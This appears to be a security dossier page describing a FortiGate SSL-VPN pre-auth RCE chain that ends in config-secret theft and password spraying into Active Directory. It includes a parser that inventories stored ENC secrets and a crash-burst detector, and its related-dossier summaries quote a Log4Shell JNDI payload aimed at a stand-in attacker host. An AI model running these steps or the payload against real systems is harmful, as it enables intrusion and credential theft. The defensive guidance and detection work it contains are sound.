FortiGate SSL-VPN pre-auth RCE → config theft
A pre-auth memory-corruption bug in FortiGate's sslvpnd (heap overflow in CVE-2023-27997, out-of-bounds write in CVE-2024-21762) gives root on the appliance. With root, pull the running configuration and decrypt the RADIUS shared secret, LDAP bind password and local VPN-user passwords that FortiOS stores in it as reversible ENC blobs rather than hashes.
§ Context
Assumed environment: the target runs FortiGate firewalls with the SSL-VPN portal exposed to the internet and unpatched against a recent sslvpnd CVE (the CVE-2024-21762 / CVE-2023-27997 class).
§ Steps
- 01 Identify FortiGate SSL-VPN (Reconnaissance, W-RECON-FINGERPRINT: Tech Stack Fingerprinting)
- 02 Trigger pre-auth heap overflow (Initial Access, VPN-FORTINET-RCE: FortiGate / FortiOS RCE)
- 03 Root shell on the appliance (Execution, T1059: Command and Scripting Interpreter)
- 04 show full-configuration / extract secrets (Collection, VPN-CONFIG-EXFIL: VPN Configuration Exfil)
- 05 Decrypt RADIUS shared secret / LDAP bind password (Credential Access, T1552: Unsecured Credentials)
- 06 Spray harvested creds into AD (Credential Access, T1110.003: Password Spraying)
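The collection and credential-access steps, as an added example that is not the dossier's own tooling: a Python parser for the text of `show full-configuration` that inventories every value stored as an `ENC` blob, ties each one to the backend it authenticates to, and reports the two settings that decide how much a stolen config is worth, `private-data-encryption` (FortiOS default: disable, so an exfiltrated config is decryptable offline with the default key) and the interfaces the SSL-VPN listens on. The sample config, hostnames, addresses and ENC blobs are constructed, and `SECRET_KEYS` is an illustrative rather than exhaustive list of keys FortiOS writes as ENC values. The actual ENC decryption depends on key material the dossier does not include, so the example stops at the inventory.

```python
"""Added example: inventory of reversible secrets in a FortiOS config dump.

Parses the text form of `show full-configuration` (config / edit / set / next /
end) with a stack, records every value stored as an `ENC` blob together with
the auth backend it unlocks, and reports `private-data-encryption` and the
SSL-VPN source interfaces. SAMPLE_CONFIG is constructed for this example; the
ENC blobs are placeholders, not real ciphertext.
"""
from __future__ import annotations

import shlex
from dataclasses import dataclass, field

SAMPLE_CONFIG = """\
config system global
    set hostname "FGT-EDGE-1"
    set private-data-encryption disable
end
config user radius
    edit "corp-radius"
        set server "10.0.0.5"
        set secret ENC Zh0Q7KQ9m1cS8x3VjzQ2hHdR5aPYBUNxtK4Cq0p2oE=
        set auth-type auto
    next
end
config user ldap
    edit "corp-ldap"
        set server "10.0.0.6"
        set cnid "sAMAccountName"
        set dn "dc=corp,dc=example"
        set type regular
        set username "CN=svc-fgt-bind,OU=Service,DC=corp,DC=example"
        set password ENC 3kTq9xLmVb2Rc8WnJ5Yd0aPfH7sGtEuZ1oXiKw4Nv6A=
    next
end
config user local
    edit "vpnuser1"
        set type password
        set passwd ENC Q2xhc3NpY0ZvcnRpT1NCbG9iUGxhY2Vob2xkZXI=
    next
end
config vpn ssl settings
    set servercert "Fortinet_Factory"
    set source-interface "wan1"
    set source-address "all"
end
"""

# Config keys whose values FortiOS writes as reversible "ENC <base64>" blobs
# rather than one-way hashes (illustrative list, assumed for this example).
SECRET_KEYS = {"secret", "password", "passwd", "psksecret"}


@dataclass
class Secret:
    path: str             # table path, e.g. "user radius/corp-radius"
    key: str              # config key holding the blob
    server: str | None    # backend the secret authenticates to, if any
    blob: str             # the ENC payload as stored


@dataclass
class Audit:
    secrets: list[Secret] = field(default_factory=list)
    private_data_encryption: bool = False      # FortiOS default is disable
    sslvpn_source_interfaces: list[str] = field(default_factory=list)


def parse_fortios_config(text: str) -> Audit:
    """Walk the config with a stack of [table, entry, settings] frames."""
    audit = Audit()
    stack: list[list] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tok = shlex.split(line)          # strips the quotes around values
        cmd = tok[0]
        if cmd == "config":
            stack.append([" ".join(tok[1:]), None, {}])
        elif cmd == "edit":
            stack[-1][1], stack[-1][2] = tok[1], {}
        elif cmd == "set":
            stack[-1][2][tok[1]] = tok[2:]
        elif cmd in ("next", "end"):
            _record(audit, stack)
            if cmd == "end":
                stack.pop()
            else:
                stack[-1][1], stack[-1][2] = None, {}
    return audit


def _record(audit: Audit, stack: list[list]) -> None:
    """Pull findings out of the frame that is being closed by next/end."""
    table, _entry, settings = stack[-1]
    path = "/".join(f"{t}/{e}" if e else t for t, e, _ in stack)
    if table == "system global" and "private-data-encryption" in settings:
        audit.private_data_encryption = settings["private-data-encryption"][0] == "enable"
    if table == "vpn ssl settings" and "source-interface" in settings:
        audit.sslvpn_source_interfaces = settings["source-interface"]
    server = settings.get("server", [None])[0]
    for key, value in settings.items():
        if key in SECRET_KEYS and value and value[0] == "ENC":
            audit.secrets.append(Secret(path, key, server, value[1]))


def summarize(audit: Audit) -> dict:
    """What an attacker gets from this config, and what a defender should fix."""
    return {
        "enc_secrets": len(audit.secrets),
        "backends": sorted({s.server for s in audit.secrets if s.server}),
        "offline_decryptable": not audit.private_data_encryption,
        "sslvpn_interfaces": audit.sslvpn_source_interfaces,
    }


if __name__ == "__main__":
    result = parse_fortios_config(SAMPLE_CONFIG)
    for s in result.secrets:
        print(f"{s.path:28} {s.key:9} -> {s.server or '(local user)'}  ENC {s.blob[:8]}...")
    print(summarize(result))
```

Run it against a real dump and the `backends` list is the set of internal hosts (RADIUS, LDAP / AD) that the harvested secrets unlock, which is exactly the target list for the spraying step; `offline_decryptable` being true means the dump alone is enough, without further access to the appliance.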
§ References
- T1059: Command and Scripting Interpreter
- T1110.003: Password Spraying
- T1552: Unsecured Credentials
§ Frequently asked
- What is the "FortiGate SSL-VPN pre-auth RCE → config theft" attack path?
- A pre-auth memory-corruption bug in FortiGate's sslvpnd (heap overflow or out-of-bounds write, CVE-2023-27997 / CVE-2024-21762 class) gives root on the appliance. The operator pulls the running config and decrypts the RADIUS, LDAP and VPN-user secrets stored in it. The chain has 6 steps, from fingerprinting the portal to spraying the recovered credentials into Active Directory.
- What starting position does this attack require?
- Unauthenticated network access to the SSL-VPN portal. Step 01 is Identify FortiGate SSL-VPN (W-RECON-FINGERPRINT), a reconnaissance step against the exposed portal; root on the appliance is what the exploit produces in step 03, not a prerequisite. Assumed environment: the target runs FortiGate firewalls with SSL-VPN exposed to the internet and unpatched against a recent sslvpnd CVE (CVE-2024-21762, CVE-2023-27997 class).
- What is the final impact of this kill-chain?
- The final step is Spray harvested creds into AD (T1110.003, Credential Access): the RADIUS shared secret, LDAP bind account and local VPN-user passwords recovered from the config are tried against the domain. From there an operator typically moves laterally or establishes persistence, and the rooted appliance itself remains a foothold on the network edge.
- How can defenders detect or prevent this attack?
- Prevention: apply the FortiOS fixes for the cited CVEs and, while a device is unpatched, follow the vendor advisory workaround of disabling SSL-VPN; do not expose the portal to the whole internet where it is not needed; enable `private-data-encryption` under `config system global` so an exfiltrated config cannot be decrypted offline with the default key; and rotate the RADIUS shared secret, LDAP bind password and local VPN-user passwords after any suspected compromise, since they are stored reversibly rather than hashed. Detection: memory-corruption exploit attempts commonly crash sslvpnd before one succeeds, so bursts of sslvpnd segfaults in `diagnose debug crashlog read` are a strong indicator; pair that with alerts on unexpected admin sessions or config changes on the appliance, and on password-spray patterns in AD (many accounts, few passwords, one source) involving the service accounts named in the FortiGate config. Each MITRE ATT&CK entry under "References" lists further detection telemetry and known threat-actor usage.
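The sslvpnd-crash indicator from the answer above, as an added example (not part of the dossier): a Python detector over the text that `diagnose debug crashlog read` prints, pairing each `application <name>` line with the `*** signal N (...) received ***` line that follows for the same PID and alerting when one daemon crashes repeatedly inside a short window. The log lines are constructed for this example and follow an assumed line shape of `N: <date> <time> <pid> <text>`; a single crash of an unrelated daemon is deliberately included so the threshold, not the mere presence of a segfault, drives the alert.

```python
"""Added example: flag bursts of sslvpnd crashes in FortiOS crashlog output.

CRASHLOG is constructed for this example in the assumed shape
`N: YYYY-MM-DD HH:MM:SS <pid> text`. Three sslvpnd segfaults inside two
minutes model failed exploit attempts; the lone wad crash is background noise.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta

CRASHLOG = """\
1: 2024-02-12 09:14:03 <18422> firmware FortiGate-100F v7.2.5,build1517b1517,230508 (GA.F) (Release)
2: 2024-02-12 09:14:03 <18422> application sslvpnd
3: 2024-02-12 09:14:03 <18422> *** signal 11 (Segmentation fault) received ***
4: 2024-02-12 09:14:03 <18422> Register dump:
5: 2024-02-12 09:14:41 <18461> application sslvpnd
6: 2024-02-12 09:14:41 <18461> *** signal 11 (Segmentation fault) received ***
7: 2024-02-12 09:15:20 <18490> application sslvpnd
8: 2024-02-12 09:15:20 <18490> *** signal 11 (Segmentation fault) received ***
9: 2024-02-12 15:02:11 <20311> application wad
10: 2024-02-12 15:02:11 <20311> *** signal 11 (Segmentation fault) received ***
"""

LINE_RE = re.compile(r"^\d+:\s+(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) <(\d+)> (.*)$")
SIGNAL_RE = re.compile(r"\*\*\* signal (\d+) \(([^)]*)\) received \*\*\*")


@dataclass(frozen=True)
class Crash:
    ts: datetime
    pid: int
    app: str
    signal: int


def parse_crashlog(text: str) -> list[Crash]:
    """One Crash per signal line, attributed to the daemon last named for that PID."""
    app_by_pid: dict[int, str] = {}
    crashes: list[Crash] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                      # firmware banner, register dump, etc.
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        pid, body = int(m.group(2)), m.group(3)
        if body.startswith("application "):
            app_by_pid[pid] = body.split(None, 1)[1]
        elif (sig := SIGNAL_RE.search(body)):
            crashes.append(Crash(ts, pid, app_by_pid.get(pid, "unknown"), int(sig.group(1))))
    return crashes


def detect_crash_bursts(crashes: list[Crash], app: str = "sslvpnd",
                        threshold: int = 3, window: timedelta = timedelta(minutes=10)) -> list[dict]:
    """Return one alert per run of at least `threshold` crashes of `app` inside `window`.

    The run is anchored at its first crash; that is enough for the dense bursts
    a brute-forced heap overflow produces, and keeps the logic linear.
    """
    times = sorted(c.ts for c in crashes if c.app == app)
    alerts = []
    i = 0
    while i < len(times):
        j = i
        while j + 1 < len(times) and times[j + 1] - times[i] <= window:
            j += 1
        if j - i + 1 >= threshold:
            alerts.append({"app": app, "first": times[i], "last": times[j], "count": j - i + 1})
        i = j + 1
    return alerts


if __name__ == "__main__":
    for alert in detect_crash_bursts(parse_crashlog(CRASHLOG)):
        print(f"ALERT {alert['app']}: {alert['count']} crashes "
              f"between {alert['first']} and {alert['last']}")
```

In practice the crashlog is read from the appliance on a schedule (or via FortiAnalyzer / syslog if the deployment forwards it) and the alert is raised into the SOC queue together with the portal's access log for the same window; a burst followed by silence is the pattern to worry about, since it can mean the last attempt worked.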
§ Related dossiers
- Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat (shared techniques: 3)
  Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration, turning its access log into a JSP file written under webapps/, then request it.
- F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB (shared techniques: 3)
  Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic: recover TLS keys, session cookies, internal SSO config.
- Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach (shared techniques: 3)
  Crafted Content-Type header is parsed as OGNL; execute commands as the app user. The 2017 Equifax breach origin: an unpatched Struts endpoint exposed to the internet.
- SNMPv2c write-community → router config exfil → cred sprays (shared techniques: 2)
  Find a router with the 'private' RW community. Trigger an SNMP-to-TFTP config download to the attacker host. The config holds the RADIUS shared secret, AAA server IP, ISAKMP PSKs, and SSH user pubkeys; spray the harvested creds.
- Log4Shell (CVE-2021-44228) → RCE → lateral (shared techniques: 2)
  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from the attacker's LDAP server, and runs it as the app user.
- Ivanti Pulse Connect Secure → pre-auth RCE → corporate VPN takeover (shared techniques: 2)
  Two-stage chain (auth bypass + command injection) lands root on the Pulse appliance. Exfil VPN configs, pivot through the tunnel into the corporate network.